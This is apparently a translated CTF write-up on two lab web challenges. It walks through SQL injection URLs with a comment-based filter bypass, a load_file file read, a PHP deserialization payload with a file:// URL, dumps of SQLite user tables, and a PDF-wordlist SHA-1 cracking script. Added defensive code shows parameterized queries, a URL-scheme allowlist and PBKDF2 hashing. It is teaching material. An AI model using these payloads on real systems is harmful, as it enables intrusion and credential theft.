In CTF competitions, Web challenges are the most common category. They test common web vulnerabilities such as arbitrary file upload, SQL injection and file inclusion, and SQL injection is the most important of these; depending on the difficulty, a challenge is often a combination of several vulnerabilities. Below are a few classic Web challenges from past CTF competitions.
Fakebook (SQL injection + PHP deserialization)
First check the robots path.
Visiting /user.php.bak gives the source code; here you can see that the blog address is matched against a regular expression.
Back on the site's home page, use join to add an article; after adding it, a link exists:
http://111.200.241.244:65355/view.php?no=1
Manually test whether an injection exists:
111.200.241.244:65355/view.php?no=2-1
http://111.200.241.244:65355/view.php?no=2-2
This confirms a numeric injection.
http://111.200.241.244:65355/view.php?no=1%20order%20by%204#
http://111.200.241.244:65355/view.php?no=1%20order%20by%205#
So the query has 4 columns. A union select query is blocked:
http://111.200.241.244:65355/view.php?no=-1%20unionselect%201,2,3,4#
This request errors out directly.
So what is blocked is the literal "union select", while "unionselect" is not blocked; consider replacing the space with a comment, i.e. union/**/select.
The bypass succeeds, and the content of the second column is displayed on the page.
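The reason the comment trick works, and the fix a defender should reach for instead of a keyword filter, can be shown in a few lines. The following is an added example and is not code from the original post or from the challenge: an in-memory SQLite table with constructed rows stands in for the challenge's PHP/MySQL view.php, and the function names (vulnerable_view, hardened_view, keyword_filter_rejects) are my own. Both MySQL and SQLite treat a /**/ comment as whitespace, so the same payload the writeup uses passes the regex but is still parsed as two keywords; the hardened handler never lets user input into the SQL text at all.

```python
import re
import sqlite3

# Constructed sample rows standing in for the challenge's users table (not real data).
SAMPLE_ROWS = [
    (1, "alice", "pw-hash-1", "profile-1"),
    (2, "bob", "pw-hash-2", "profile-2"),
]

def build_db():
    """In-memory SQLite copy of a four-column users table, so the demo runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (no INTEGER PRIMARY KEY, username TEXT, passwd TEXT, data TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn

# The kind of keyword filter the challenge used: it rejects only the literal
# token sequence 'union' + whitespace + 'select'.
UNION_SELECT = re.compile(r"union\s+select", re.IGNORECASE)

def keyword_filter_rejects(value):
    return UNION_SELECT.search(value) is not None

def vulnerable_view(conn, no):
    """String concatenation behind a keyword filter (the pattern the writeup defeats)."""
    if keyword_filter_rejects(no):
        raise PermissionError("blocked by keyword filter")
    sql = "SELECT no, username, passwd, data FROM users WHERE no = " + no
    return conn.execute(sql).fetchall()

def hardened_view(conn, no):
    """Validate the parameter's type, then bind it: the SQL text never contains user input."""
    if not re.fullmatch(r"[0-9]{1,9}", no):
        raise ValueError("no must be a small positive integer")
    sql = "SELECT no, username, passwd, data FROM users WHERE no = ?"
    return conn.execute(sql, (int(no),)).fetchall()

def demo():
    conn = build_db()
    results = {}
    # 1. Arithmetic in the parameter is evaluated by the database: '2-1' behaves like '1',
    #    which is exactly the signal the writeup uses to confirm a numeric injection.
    results["arithmetic_evaluated"] = vulnerable_view(conn, "2-1") == vulnerable_view(conn, "1")
    # 2. The filter catches the plain spelling ...
    try:
        vulnerable_view(conn, "-1 union select 1,2,3,4")
        results["plain_union_blocked"] = False
    except PermissionError:
        results["plain_union_blocked"] = True
    # 3. ... but a comment in place of the space is whitespace to the SQL parser, not to the regex,
    #    so the attacker-chosen row (1,2,3,4) comes back and column 2 is rendered by the page.
    results["comment_union_rows"] = vulnerable_view(conn, "-1 union/**/select 1,2,3,4")
    # 4. The hardened handler rejects anything that is not an integer literal, so neither the
    #    arithmetic probe nor the union payload ever reaches the database.
    for payload in ("2-1", "-1 union/**/select 1,2,3,4"):
        try:
            hardened_view(conn, payload)
            results["hardened_rejects_" + payload] = False
        except ValueError:
            results["hardened_rejects_" + payload] = True
    results["hardened_normal"] = hardened_view(conn, "1")
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The point for a defender is item 4: a blocklist has to anticipate every spelling the SQL parser accepts, whereas a bound parameter with a type check has nothing to anticipate. The same applies to a WAF in front of the application; it can log such requests for detection, but it should not be the only control.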
Next, query the databases, tables and columns:
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(schema_name),3,4%20from%20information_schema.schemata%20#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%22fakebook%22#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_schema=%22fakebook%22#
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,group_concat(data),3,4%20from%20fakebook.users#
Here the MySQL load_file function can read the flag.php file directly:
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,load_file(%22/var/www/html/flag.php%22),3,4#
flag{c1e552fdf77049fabf65168f22f7aeab}
In addition, the data can also be read by constructing a PHP deserialization payload:
http://111.200.241.244:65355/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:4:%22test%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27
View the page source and base64-decode it to obtain the flag.
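What the serialized UserInfo object above carries is a blog field whose scheme is file:// rather than http(s); the regular expression that user.php.bak applies when a blog address is submitted never sees a record that is written through the injection and later unserialized by view.php. The check therefore has to happen at fetch time, on whatever the unserialized object contains. The block below is an added example, not code from the original post or from the challenge (whose code is PHP): it is a small parser for the PHP serialize() format used in the payload, written in Python so the record can be inspected offline, plus a fetch-time allowlist on the URL scheme. The function and class names (php_unserialize, PhpObject, blog_url_allowed, check_blog_field) are my own, and the benign record is constructed.

```python
from dataclasses import dataclass, field
from urllib.parse import urlsplit

class PhpUnserializeError(ValueError):
    pass

@dataclass
class PhpObject:
    class_name: str
    props: dict = field(default_factory=dict)

def php_unserialize(data: bytes):
    """Parse PHP serialize() output (tags N, b, i, s, a, O) into Python values."""
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise PhpUnserializeError("trailing bytes at offset %d" % pos)
    return value

def _expect(data, pos, ch):
    if data[pos:pos + 1] != ch:
        raise PhpUnserializeError("expected %r at offset %d" % (ch, pos))

def _read_quoted(data, pos):
    """Read <len>:"<bytes>" starting at pos; returns (bytes, position after the closing quote)."""
    colon = data.index(b":", pos)
    length = int(data[pos:colon])          # PHP lengths are byte counts, not character counts
    _expect(data, colon + 1, b'"')
    start = colon + 2
    raw = data[start:start + length]
    if len(raw) != length:
        raise PhpUnserializeError("string truncated")
    _expect(data, start + length, b'"')
    return raw, start + length + 1

def _read_count(data, pos):
    """Read <count>:{ starting at pos; returns (count, position just inside the braces)."""
    colon = data.index(b":", pos)
    _expect(data, colon + 1, b"{")
    return int(data[pos:colon]), colon + 2

def _parse(data, pos):
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;
        _expect(data, pos + 1, b";")
        return None, pos + 2
    if tag in (b"i", b"b"):                           # i:123;  b:1;
        end = data.index(b";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if tag == b"b" else num), end + 1
    if tag == b"s":                                   # s:4:"test";
        raw, pos = _read_quoted(data, pos + 2)
        _expect(data, pos, b";")
        return raw.decode("utf-8", "replace"), pos + 1
    if tag == b"a":                                   # a:2:{key;value;key;value;}
        count, pos = _read_count(data, pos + 2)
        items = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            items[key], pos = _parse(data, pos)
        _expect(data, pos, b"}")
        return items, pos + 1
    if tag == b"O":                                   # O:8:"UserInfo":3:{prop;value;...}
        name, pos = _read_quoted(data, pos + 2)
        _expect(data, pos, b":")
        count, pos = _read_count(data, pos + 1)
        obj = PhpObject(name.decode("utf-8", "replace"))
        for _ in range(count):
            key, pos = _parse(data, pos)
            obj.props[key], pos = _parse(data, pos)
        _expect(data, pos, b"}")
        return obj, pos + 1
    raise PhpUnserializeError("unsupported tag %r at offset %d" % (tag, pos))

ALLOWED_SCHEMES = ("http", "https")

def blog_url_allowed(url):
    """Fetch-time check: only http(s) URLs that name a host may be requested."""
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.hostname)

def check_blog_field(serialized):
    """Unserialize a stored UserInfo record and decide whether its blog URL may be fetched."""
    obj = php_unserialize(serialized)
    if not isinstance(obj, PhpObject) or obj.class_name != "UserInfo":
        raise PhpUnserializeError("expected a UserInfo object")
    blog = obj.props.get("blog", "")
    return blog, blog_url_allowed(blog)

# The payload from the writeup (URL-decoded) and a constructed benign record for comparison.
PAYLOAD = b'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
BENIGN = b'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:123;s:4:"blog";s:19:"https://example.org";}'

if __name__ == "__main__":
    for record in (PAYLOAD, BENIGN):
        print(check_blog_field(record))
```

Running it shows the writeup's record parsed into a UserInfo object whose blog value is rejected by the scheme allowlist, while the constructed https record is accepted. A stricter deployment would also resolve the host and refuse loopback and private ranges before fetching, since an http(s) scheme alone does not rule out internal targets.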
FlatScience (SQL injection + PDF)
Check the robots.txt path.
Check the source of login.php.
A debug parameter is visible; visiting it gives:
http://111.200.241.244:59943/login.php?debug
From this it is clear that the usr parameter very likely has an injection, and that the database is SQLite.
Capture the request and construct the injection:
usr=-123' union select 'aaa','bbb'--+&pw=123
The second column of the query is echoed in the name field of Set-Cookie.
usr=-123' union select name,sql from sqlite_master --+&pw=123
This returns the SQL statement +CREATE+TABLE+Users%28id+int+primary+key%2Cname+varchar%28255%29%2Cpassword+varchar%28255%29%2Chint+varchar%28255%29%29;
i.e.
CREATE TABLE Users(id int primary key,name varchar(255),password varchar(255),hint varchar(255));
Next, query the data of each column:
usr=-123' union select 1,group_concat(hint)from users --+&pw=123
usr=-123' union select 1,group_concat(id)from users --+&pw=123
usr=-123' union select 1,group_concat(name)from users --+&pw=123
usr=-123' union select 1,group_concat(password)from users --+&pw=123
The results are, respectively:
hint: my fav word in my fav paper?!,my love is�,the password is password;
id: 1,2,3;
name: admin,fritze,hansi;
password: 3fab54a50e770d830c0416df817567662a9dc85c,54eae8935c90f467427f05e4ece82cf569f89507,34b0bb7c304949f9ff2fc101eef0f048be10d3bd;
From the debug page we know that password is obtained by hashing the plaintext password concatenated with Salz! using the sha1 function. The hint mentions "my fav word in my fav paper?!", so the password may be in one of the PDF documents on the site.
Here a script from the Internet is used to go through all the PDFs (saved in the current directory) and brute-force the admin password:
# Python 3 version of the script; requires the pdfminer.six package
from io import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import os
import hashlib

# admin's hash recovered through the injection above: sha1(password + "Salz!")
TARGET = '3fab54a50e770d830c0416df817567662a9dc85c'

def get_pdf():
    # All PDF files in the current directory
    return [i for i in os.listdir("./") if i.endswith(".pdf")]

def convert_pdf_2_text(path):
    # Extract the text of every page of one PDF into a string
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
    text = retstr.getvalue()
    device.close()
    retstr.close()
    return text

def find_password():
    for i in get_pdf():
        print("Searching word in " + i)
        # Try every whitespace-separated word of the PDF as a candidate password
        for word in convert_pdf_2_text(i).split():
            sha1_password = hashlib.sha1((word + "Salz!").encode()).hexdigest()
            if sha1_password == TARGET:
                print("Found the password: " + word)
                return

if __name__ == "__main__":
    find_password()
The admin password is finally found to be: ThinJerboa
After logging in, the flag is flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}
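The password scheme that made this challenge solvable is worth contrasting with a sound one. The block below is an added example, not code from the original post: legacy_hash reproduces the challenge's sha1(password + "Salz!") construction, and hash_password / verify_password (my own names, standard-library only) show the per-user random salt plus a slow key-derivation function that a defender should use instead. With a single fixed salt and one fast SHA-1, every word of every PDF is one cheap hash that tests all accounts at once; with a per-user salt, each account needs its own pass, and each guess costs the full PBKDF2 iteration count.

```python
import hashlib
import hmac
import os

FIXED_SALT = b"Salz!"
# Kept low so the demo runs quickly; current guidance for PBKDF2-HMAC-SHA256 is
# several hundred thousand iterations.
PBKDF2_ITERATIONS = 100_000

def legacy_hash(password):
    """The challenge's scheme: sha1(password + fixed salt), one fast hash, same salt for every user."""
    return hashlib.sha1(password.encode() + FIXED_SALT).hexdigest()

def hash_password(password, salt=None):
    """Per-user random salt plus a slow KDF, stored as 'pbkdf2_sha256$iterations$salthex$hashhex'."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())

def verify_password(stored, password):
    """Recompute with the stored salt and iteration count and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        iterations = int(iterations)
    except ValueError:
        return False                      # malformed record, never a match
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate.hex(), digest_hex)

def compare_schemes(password):
    """Two accounts that chose the same password: identical under the fixed salt,
    distinct under per-user salts, so a leaked table no longer reveals shared passwords."""
    legacy_a, legacy_b = legacy_hash(password), legacy_hash(password)
    modern_a, modern_b = hash_password(password), hash_password(password)
    return {
        "legacy_identical": legacy_a == legacy_b,
        "modern_identical": modern_a == modern_b,
        "modern_verifies": verify_password(modern_a, password) and verify_password(modern_b, password),
        "modern_rejects_wrong": verify_password(modern_a, password + "x"),
    }

if __name__ == "__main__":
    for key, value in compare_schemes("correct horse").items():
        print(key, "->", value)
```

The stored string carries its own parameters, so the iteration count can be raised later and old records re-hashed on the user's next successful login; a fixed global salt baked into the application, as in the challenge, cannot be rotated without resetting every password.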
Originally published on the WeChat public account 第59号: CTF之Web题型总结二 (CTF Web challenge summary, part 2)